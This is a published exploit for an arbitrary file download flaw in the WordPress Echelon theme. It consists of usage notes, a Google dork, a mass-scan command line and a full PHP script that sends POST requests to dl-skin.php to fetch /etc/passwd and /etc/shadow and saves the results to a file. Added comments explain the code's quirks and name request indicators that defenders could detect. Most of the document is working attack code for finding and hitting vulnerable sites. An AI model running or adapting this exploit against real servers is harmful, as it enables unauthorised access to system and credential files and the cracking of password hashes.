*Name:*
Wordpress A.F.D Theme Echelon / INURL - BRASIL
*Description:*
This exploit allows an attacker to download any writable file from the server
*Usage info:*
Put the path of the file in the exploit's file field, then click the
"Download" button; the file is returned directly
File download /etc/passwd & /etc/shadow
The flaw consists of an exploitable $_POST file parameter in
/wp-content/themes/echelon/lib/scripts/dl-skin.php
The following fields are exploited for Arbitrary File Download
*POST:*
_mysite_download_skin={$config['file']}&submit=Download
ex:
_mysite_download_skin=/etc/passwd&submit=Download
*Exploit:*
<?php
#===============================================================================
# NAME: Wordpress A.F.D Theme Echelon
# TYPE: Arbitrary File Download
# Google DORK: inurl:/wp-content/themes/echelon
# Vendor: www.wordpress.org
# Tested on: Linux
# EXECUTE: php exploit.php www.alvo.com.br
# OUTPUT: EXPLOIT_WPAFD_Echelon.txt
# AUTHOR: Cleiton Pinheiro
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# GIT: https://github.com/googleinurl
# YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
#
#
------------------------------------------------------------------------------
# Command Exec Scanner INURLBR:
# ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s
save.txt --comand-all "php exploit.php _TARGET_"
#
------------------------------------------------------------------------------
# Download Scanner INURLBR:
# https://github.com/googleinurl/SCANNER-INURLBR
#===============================================================================
# --- Runtime setup -----------------------------------------------------------
# error_reporting(1) is E_ERROR only: the notices raised later by variables
# that are read before being initialised ($postDados_format, $line) are
# hidden, not fixed.
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
# Implicit flushing plus closing the default output buffer, so each print
# reaches the terminal immediately (see also __plus()).
ob_implicit_flush(true);
ob_end_flush();
# --- Target parsing ----------------------------------------------------------
# argv[1] is mandatory; exit with a usage message otherwise.
print empty($argv[1]) ? exit('0x[ERROR]: DEFINA URL / Execute: php
exploit.php www.alvo.com.br') : NULL;
# Prefix "http://" unless the argument already contains the substring "http"
# (strstr is a substring test, so "http" anywhere in the argument satisfies it).
$argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://
{$argv[1]}";
# Keep only scheme + host: the character class stops at ':' and '/', so a port
# or path given on the command line is discarded. Exits when nothing matches.
!(preg_match_all("#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i",
$argv[1], $alvo_)) ? exit('0x[ERROR]: DEFINA URL / Execute: php exploit.php
www.alvo.com.br') : NULL;
# Separator printed around harvested values (also written to the output file).
$config['line'] =
"\n------------------------------------------------------------------------------------------------------------------\n";
# First full match of the regex above (group 0, first occurrence).
$config['alvo'] = $alvo_[0][0];
# Path of the vulnerable theme script. A POST to this path carrying the
# "_mysite_download_skin" field (built in __request_info) is the stable
# indicator a detection rule can key on.
$config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php";
# Push buffered output to the client immediately: PHP's own output buffer
# first, then the SAPI/system buffer.
function __plus() {
    ob_flush();
    flush();
}
# Split a "k1=v1&k2=v2" query string into an associative array whose values
# are urlencode()d. Keys are kept verbatim; only the first '=' of each pair
# separates key from value, anything after a second '=' is dropped.
function __convertUrlQuery($query) {
    $encoded = [];
    foreach (explode('&', $query) as $pair) {
        [$key, $value] = explode('=', $pair);
        $encoded[$key] = urlencode($value);
    }
    return $encoded;
}
# Send one POST to the target's dl-skin.php requesting $config['file'] and
# return the raw response (headers + body, because CURLOPT_HEADER is set)
# together with a one-line summary of its status, Server and
# Content-Disposition headers.
#   $curl   : handle from curl_init(); it is closed before returning.
#   $config : needs 'alvo' (base URL), 'exploit' (script path), 'file'.
# Returns array('corpo' => string|false, 'server' => curl_getinfo array,
# 'info' => string). The FALSE branch at the end is unreachable (see below).
function __request_info($curl, $config) {
# Body is "_mysite_download_skin=<file>&submit=Download", values urlencoded.
$postDados =
__convertUrlQuery("_mysite_download_skin={$config['file']}&submit=Download");
# NOTE: $postDados_format is appended to before being initialised; the
# resulting notice is suppressed by error_reporting(1) at the top of the file.
foreach ($postDados as $campo => $valor) {
$postDados_format .= $campo . '=' . ($valor) . '&';
}
$postDados_format = rtrim($postDados_format, '&');
# count($postDados) is 2 here; CURLOPT_POST only needs a truthy value.
curl_setopt($curl, CURLOPT_POST, count($postDados));
curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format);
curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']);
# The User-Agent is re-randomised on every request, so UA-based blocking is
# unreliable; the constant parts ("blog.inurl.com.br/", "Chrome/26.0.1410.63")
# and, above all, the request path + POST field name are the stable indicators.
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0
(X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/'
. md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/'
. rand(1, 500) . '.31');
# Referer is set to the exploited URL itself.
curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] .
$config['exploit']);
# Only host-name verification is disabled; CURLOPT_SSL_VERIFYPEER keeps its
# default, so an untrusted certificate still fails the request.
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
# Response headers are prepended to the returned body.
curl_setopt($curl, CURLOPT_HEADER, 1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$corpo = curl_exec($curl);
$server = curl_getinfo($curl);
$status = NULL;
# Parentheses serve as the regex delimiters; each call captures every line
# fragment from the given token to end of line. With no match, [0][0] is
# undefined and the summary below simply contains an empty field.
preg_match_all('(HTTP.*)', $corpo, $status['http']);
preg_match_all('(Server:.*)', $corpo, $status['server']);
preg_match_all('(Content-Disposition:.*)', $corpo,
$status['Content-Disposition']);
# Collapse CR/LF so the summary prints on a single line.
$info = str_replace("\r", '', str_replace("\n", '',
"{$status['http'][0][0]}, {$status['server'][0][0]}
{$status['Content-Disposition'][0][0]}"));
curl_close($curl);
unset($curl);
# curl_exec() returns string|false, never null, so isset($corpo) is always
# true: a failed request is reported as corpo => false, not as FALSE.
return isset($corpo) ? array('corpo' => $corpo, 'server' => $server,
'info' => $info) : FALSE;
}
# Report the result for $config['file'] and, when the response contains
# "root" (case-insensitive), append the matched lines to
# EXPLOIT_WPAFD_Echelon.txt in the current working directory.
#   $config : needs 'file', 'line' (separator) and 'alvo' (target).
#   $rest   : return value of __request_info(); only 'corpo' is read.
function main($config,$rest) {
__plus();
# NOTE: date("h:m:s") is hour:MONTH:second -- 'm' is the month; minutes
# would be 'i'. Timestamps in the output file carry the same quirk.
print "0x " . date("h:m:s") . " [INFO][EXPLOITATION THE FILE]:
{$config['file']}:\n";
# Collect the remainder of any line from "root:", "sbin:", "ftp:", "nobody:"
# or "mail:" onward (no anchors, so the token may sit mid-line). $rest['corpo']
# still includes the HTTP headers (CURLOPT_HEADER in __request_info), so a
# match can come from either part of the response.
preg_match_all("(root:.*)", $rest['corpo'], $final);
preg_match_all("(sbin:.*)", $rest['corpo'], $final__);
preg_match_all("(ftp:.*)", $rest['corpo'], $final___);
preg_match_all("(nobody:.*)", $rest['corpo'], $final____);
preg_match_all("(mail:.*)", $rest['corpo'], $final_____);
$_final = array_merge($final[0], $final__[0], $final___[0],
$final____[0], $final_____[0]);
$res = NULL;
# The verdict is only "the response contains 'root' in any case": an error
# page mentioning the word is a false positive, and a failed request
# (corpo === false) is reported as [NOT VULN] rather than as an error.
if (preg_match("#root#i", $rest['corpo'])) {
$res.= "0x " . date("h:m:s") . " [INFO][IS
VULN][RESUME][VALUES]:\n";
$res.=$config['line'] . "\n";
foreach ($_final as $value) {
$res.="0x " . date("h:m:s") . " [VALUE]: $value\n";
}
$res.=$config['line'];
__plus();
# Harvested lines are appended to a plaintext file on disk, one record
# per target, prefixed with the target URL.
file_put_contents('EXPLOIT_WPAFD_Echelon.txt',
"{$config['alvo']}\n{$res}\n", FILE_APPEND);
print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n";
} else {
print "0x " . date("h:m:s") . " [INFO][NOT VULN]\n";
}
}
# --- Driver ------------------------------------------------------------------
# Two requests per target: /etc/passwd first, then /etc/shadow. Each result is
# printed and, when main() judges it vulnerable, appended to the output file.
print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL -
BRASIL\n";
$config['file'] = '/etc/passwd';
# A fresh curl handle per request; __request_info() closes it, so $objcurl
# is never used again.
$rest = __request_info($objcurl = curl_init(), $config);
__plus();
# NOTE: $line is undefined here (the separator lives in $config['line']), so
# this prints nothing; the notice is hidden by error_reporting(1).
print $line;
# One-line summary of status / Server / Content-Disposition of the response.
print "0x " . date("h:m:s") . " [INFO]: {$rest['info']}\n";
print "0x " . date("h:m:s") . " [INFO][TARGET]: {$config['alvo']}\n";
main($config,$rest);
__plus();
$config['file'] = '/etc/shadow';
# Same flow for the second file; main() reuses the same patterns and verdict.
$rest = __request_info($objcurl = curl_init(), $config);
__plus();
main($config,$rest);
__plus();